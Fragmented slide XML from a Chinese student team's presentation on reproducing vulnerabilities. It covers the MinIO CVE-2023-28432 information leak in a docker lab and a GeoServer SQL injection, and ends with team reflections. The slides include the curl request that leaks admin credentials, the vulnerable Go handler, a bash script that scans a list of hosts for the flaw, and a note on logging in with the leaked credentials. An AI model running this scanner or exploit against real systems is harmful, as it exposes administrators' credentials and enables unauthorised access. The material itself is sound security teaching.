            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、-V, --version：打印版本信息并退出。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F03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7579360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93800" y="1067435"/>
            <a:ext cx="792035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</a:rPr>
              <a:t>靶场启动：</a:t>
            </a:r>
            <a:endParaRPr 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</a:rPr>
              <a:t> 通过运行 docker-compose up -d 命令，您启动了一个名为 cve-2023-28432 的服务，并且该服务的 node2，node3 和 node1 实例都已经是最新版本，因此没有进行任何更新。</a:t>
            </a:r>
            <a:endParaRPr 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endParaRPr lang="zh-CN" alt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5" name="图片 3" descr="824d4a789d9887128159e7d0869808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3035" y="2414270"/>
            <a:ext cx="9567545" cy="20300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7174230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93800" y="1067435"/>
            <a:ext cx="79203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</a:rPr>
              <a:t>发送一个POST请求：</a:t>
            </a:r>
            <a:endParaRPr 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3800" y="1920240"/>
            <a:ext cx="10029825" cy="208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193800" y="389890"/>
            <a:ext cx="7609840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747395" y="965200"/>
            <a:ext cx="10991850" cy="51263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、使用 curl 命令发送一个 POST 请求到http://192.168.147.128:9000/minio/bootstrap/v1/verify 端点。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、"Host": "node1:900g": 这个参数指定请求头中的 Host 字段，其值为 "node1:900g"。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、"Path": "/mnt/data1": 这个参数指定路径段，将其附加到请求 URL 的末尾，路径为 "/mnt/data1"。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、"Ra Path": "": 这个参数被指定为空字符串，可能是在请求中的错误输入。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、"MinioEndpoints": [...]: 这个参数定义了一个名为 MinioEndpoints 的列表，其中包含多个示例的 Minio 端点的详细信息。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</a:rPr>
              <a:t>6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、"Cndline": "...": 这个参数指定了一个名为 Cndline 的字段，其中包含了一系列通过空格分隔的 URL。这些 URL 可能是相关服务的端点。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</a:rPr>
              <a:t>7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、"platform": "os: linux Arch: amd64"t1: 这个参数指定了平台信息，包括操作系统和体系结构。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</a:rPr>
              <a:t>8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、"MinioEnv": {...}: 这个参数包含了一系列 Minio 相关配置的键值对。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733615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93800" y="1067435"/>
            <a:ext cx="79203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</a:rPr>
              <a:t>发现包含敏感字段：用户名和密码：</a:t>
            </a:r>
            <a:endParaRPr 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4915" y="1598930"/>
            <a:ext cx="9578340" cy="4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712025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6795" y="1569720"/>
            <a:ext cx="9022715" cy="433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8636000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93800" y="1067435"/>
            <a:ext cx="79203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</a:rPr>
              <a:t>直接登入：</a:t>
            </a:r>
            <a:endParaRPr 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00" y="1568450"/>
            <a:ext cx="8839200" cy="435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193800" y="389890"/>
            <a:ext cx="833945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1193800" y="965200"/>
            <a:ext cx="9159875" cy="5347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sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>相关漏洞代码</a:t>
            </a:r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：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1600">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>VerifyHandler 函数中调用了 getServerSystemCfg() 函数，该函数返回了 ServerSystemConfig 结构体，其中包含了环境变量 MINIO_ 的键值对。由于环境变量是全局可见的，因此会将账号打印出来 。为什么环境变量中会包含账号密码信息呢？因为根据官方的启动说明，在MinIO在启动时会从环境变量中读取用户预设的管理员账号和密码，如果省略则默认账号密码为minioadmin/minioadmin。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="16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// minio/cmd/bootstrap-peer-server.go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func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {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  ctx := newContext(r, w, "VerifyHandler")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  cfg := getServerSystemCfg()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  logger.LogIf(ctx, json.NewEncoder(w).Encode(&amp;cfg))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}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 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// minio/cmd/bootstrap-peer-server.go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func getServerSystemCfg() ServerSystemConfig {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  envs := env.List("MINIO_")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  envValues := make(map[string]string, len(envs))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  for _, envK := range envs {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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r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  <a:p>
            <a:endParaRPr lang="zh-CN" sz="2000">
              <a:latin typeface="Calibri Light" panose="020F03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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2299335" y="1738630"/>
            <a:ext cx="424751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sz="4400" b="0" dirty="0"/>
              <a:t>项目任务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
              <a:t>概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="1738630"/>
            <a:ext cx="424751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en-US" altLang="zh-CN" sz="8800" dirty="0"/>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410845" y="3991610"/>
            <a:ext cx="6136005" cy="676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>
                <a:ln w="0" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="349E77"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Task Description</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0">
              <a:ln w="0" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="349E77"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
              <a:uFillTx/>
              <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204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176770" y="1950720"/>
            <a:ext cx="5089525" cy="4271010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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:def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139E4B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1pPr>
            <a:lvl2pPr marL="6858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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr kumimoji="0" lang="zh-CN" altLang="en-US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2pPr>
            <a:lvl3pPr marL="11430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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:def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3pPr>
            <a:lvl4pPr marL="16002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4pPr>
            <a:lvl5pPr marL="20574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环境搭建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漏洞复现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poc</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编写及提交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193800" y="389890"/>
            <a:ext cx="696023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93800" y="990600"/>
            <a:ext cx="939990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// skip certain environment variables as part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  // of the whitelist and could be configured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  // differently on each nodes, update skipEnvs()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  // map if there are such environment values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  if _, ok := skipEnvs[envK]; ok {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    continue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  }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  envValues[envK] = env.Get(envK, "")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}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return ServerSystemConfig{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  MinioEndpoints: globalEndpoints,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  MinioEnv:       envValues,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}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  <a:p>
            <a:r>
              <a:rPr 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}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:latin typeface="Calibri Light" panose="020F03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193800" y="389890"/>
            <a:ext cx="696023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93800" y="990600"/>
            <a:ext cx="9399905" cy="523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altLang="zh-CN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POC</a:t>
            </a:r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#!/bin/bash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# Author : whgojp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# Enable colors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GREEN='\033[0;32m'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NC='\033[0m'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count=0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while read -r line; do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((count++))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193800" y="389890"/>
            <a:ext cx="696023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pPr>
              <a:buNone/>
            </a:pPr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zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MiniO信息泄露漏洞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93800" y="990600"/>
            <a:ext cx="9399905" cy="523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response=$(curl -s -XPOST "$line/minio/bootstrap/v1/verify -k" --connect-timeout 3)	#修改一下 这里加了-k 忽略对 SSL 证书验证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if echo "$response" | grep -q "MinioEnv"; then		#匹配关键词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  printf "${GREEN}[!] ${line}${NC}：is Vulnerable！！！\n"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  echo "$line" &gt;&gt; result.txt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else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  printf "[+] (${count}/$(wc -l &lt; MinIO.txt)) Scanning: ${line}\n"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 fi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done &lt; MinIO.txt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>
              <a:latin typeface="Calibri Light" panose="020F03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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2299335" y="1738630"/>
            <a:ext cx="424751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sz="4400" b="0" dirty="0"/>
              <a:t>遇到的问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
              <a:t>及解决措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="1738630"/>
            <a:ext cx="424751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en-US" altLang="zh-CN" sz="8800" dirty="0"/>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4118610" y="4102735"/>
            <a:ext cx="7524750" cy="676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>
                <a:ln w="0" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="349E77"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Problems and Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400">
              <a:ln w="0" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="349E77"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
              <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0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193800" y="389890"/>
            <a:ext cx="697928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dirty="0"/>
              <a:t>问题及解决措施</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179830" y="965200"/>
            <a:ext cx="922083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ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"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</a:rPr>
              <a:t>GeoServer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 /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</a:rPr>
              <a:t>geoserver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</a:rPr>
              <a:t>ows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存在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SQL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注入漏洞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zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>虚拟机配置好环境之后，查询到地理图层的列表信息、获取到某个图层的属性名称之后，构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查询数据库版本信息但始终无法获取。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重新配置环境，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>虚拟机上安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>geoserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 2.22.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，解决了问题。</a:t>
            </a:r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193800" y="389890"/>
            <a:ext cx="697928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dirty="0"/>
              <a:t>问题及解决措施</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="999490" y="659765"/>
            <a:ext cx="117944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endParaRPr lang="en-US">
              <a:latin typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2299335" y="2012315"/>
            <a:ext cx="424751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sz="4400" b="0" dirty="0"/>
              <a:t>心得体会</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="1738630"/>
            <a:ext cx="424751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en-US" altLang="zh-CN" sz="8800" dirty="0"/>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4534535" y="4102735"/>
            <a:ext cx="7108825" cy="676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>
                <a:ln w="0" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="349E77"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Learn from Experience</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400">
              <a:ln w="0" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="349E77"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
              <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0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193800" y="389890"/>
            <a:ext cx="697928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dirty="0"/>
              <a:t>心得体会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82980" y="1130935"/>
            <a:ext cx="10663555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刘耀月：在近一个月的实习实训的学习基础上完成本次漏洞复现的团队项目，让我再次深刻认识到团队的力量，在组员的相互帮助下对自己不太熟练的漏洞问题进行了练习与巩固，也让我拥有了处理实际漏洞问题的经验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2980" y="2677795"/>
            <a:ext cx="10653395" cy="12306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牛雪力：漏洞复现是一个多种分析技术相互结合，共同使用，互补优势的过程。看起来简单的任务，在实践过程中，才会发现有很多困难。所以团队成员互相提醒，协同合作，从多角度分析解决问题，才能提高效率。脚踏实地完善漏洞复现的每一个细节，才能真正的掌握知识和技能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235" y="4531995"/>
            <a:ext cx="10636885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张永豪：在此次实习实训的小组项目中，我更进一步理解了之前学习的漏洞挖掘和利用的相关知识，积累了实战经验，通过小组成员间的互帮互助，我们一起克服了很多困难，大家都在不断地学习、进步，在这个过程中也都收获了很多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193800" y="389890"/>
            <a:ext cx="697928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dirty="0"/>
              <a:t>心得体会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82980" y="1130935"/>
            <a:ext cx="10663555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李金霖：通过这四周的实训实习让我接触到了更多安全方面的知识，在小组合作过程中也感受到了一些漏洞的隐蔽，往往只是一些小疏忽就会产生不可估量的后果，深刻认识到网络安全任重而道远，需要我们不断学习进步，承担保护中国网络安全的重担使命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2980" y="2363470"/>
            <a:ext cx="10653395" cy="36931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常昊：对于这次的团队协作，我体会到了一个优秀的团队必须要符合以下两个点：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1.目标统一，职能分散到每个人。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考虑到我们现有知识和经验的不足，难以同时具备各种综合技能。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所以在分工时，每个队员的任务应该各有倾向，如耐心细致的同学主要负责信息收集，创新能力强的同学主要负责代码编程，逻辑能力强的同学主要负责论文设计，等等。如此才能分工明确，队员优势互补。为了最大限度调动成员的积极性，虽然大家职能不一，但我们的兴趣一致，目标统一。如此我们才能齐心协力，以高质、高效地完成项目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2.加强交流，相互信任。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交流不仅是对工作进行阶段性的总结和计划的必要步骤，是集中大家智慧、激发灵感的重要手段。前期工作中，由于我们缺乏交流，造成大家分工不明确，工作拖沓，组员有不满情绪的现象。经过大家的交谈，坦诚相待，不仅使问题得以解决，还进一步深厚了同学友谊，强化了团队力量，促使下一步工作顺利进行，实践了“友谊第一”团队精神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hanks for Watching"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725420" y="2588260"/>
            <a:ext cx="6741160" cy="5537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ctr">
              <a:defRPr sz="3600" b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/>
              <a:t>Thanks for Watching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>！</a:t>
            </a:r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66800" y="365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/>
              <a:t>任务概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty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19430" y="1003300"/>
          <a:ext cx="11306176" cy="484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258"/>
                <a:gridCol w="1933258"/>
                <a:gridCol w="7439660"/>
              </a:tblGrid>
              <a:tr h="43053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项目阶段</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="2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工作内容</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="2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Calibri" panose="020F0502020204030204"/>
                        </a:rPr>
                        <a:t>环境搭建</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" alt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Calibri" panose="020F0502020204030204"/>
                        </a:rPr>
                        <a:t>在漏洞介绍界面找到漏洞源码下载地址</a:t>
                      </a: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Calibri" panose="020F0502020204030204"/>
                        </a:rPr>
                        <a:t>，</a:t>
                      </a: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Calibri" panose="020F0502020204030204"/>
                        </a:rPr>
                        <a:t>在本地进行环境搭建，访问相应地址进入网页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Calibri" panose="020F0502020204030204"/>
                        </a:rPr>
                        <a:t>。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" alt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Calibri" panose="020F0502020204030204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 row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漏洞复现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指纹提取</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="24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endParaRPr lang="en-US" altLang="en-US" sz="24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通过网页源代码和响应头的各种信息搜集指纹，填入GWAF指纹识别软件进行进一步的指纹检索。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="2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7280">
                <a:tc vMerge="1"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信息收集</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="2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endParaRPr lang="en-US" altLang="en-US" sz="2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搜集网上公开的各种有关的漏洞信息，包括但不限于fofa、GitHub等，结合指纹信息，更深入的了解该漏洞的成因与特征。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="2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2155">
                <a:tc vMerge="1"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漏洞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实现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endParaRPr lang="zh-CN" altLang="en-US" sz="2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根据指纹提取和信息收集，在搭建的环境下进行漏洞复现，目标是完成上传不被允许的木马文件。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="2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555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POC编写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及提交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在漏洞成功复现后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根据模版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编写poc脚本自动完成漏洞实验，并将详细poc信息上传至poc平台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en-US" altLang="en-US" sz="24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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2299335" y="1738630"/>
            <a:ext cx="424751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sz="4400" b="0" dirty="0"/>
              <a:t>项目小组分工</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
              <a:t>及安排</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="1738630"/>
            <a:ext cx="424751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en-US" altLang="zh-CN" sz="8800" dirty="0"/>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507355" y="4102735"/>
            <a:ext cx="6136005" cy="676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>
                <a:ln w="0" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="349E77"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Division  of  Tasks</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0">
              <a:ln w="0" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="349E77"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
              <a:uFillTx/>
              <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0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66800" y="34480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193800" y="501650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/>
              <a:t>任务分工</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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24865" y="1224280"/>
          <a:ext cx="10631805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9360"/>
                <a:gridCol w="3594735"/>
                <a:gridCol w="4537710"/>
              </a:tblGrid>
              <a:tr h="59436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err="1"/>
                        <a:t>GeoServer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t> /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                        <a:t>geoserver</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
                        <a:t>ows</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
                        <a:t>存在</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
                        <a:t>SQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
                        <a:t>注入漏洞 </a:t>
                      </a:r>
                      <a:r>
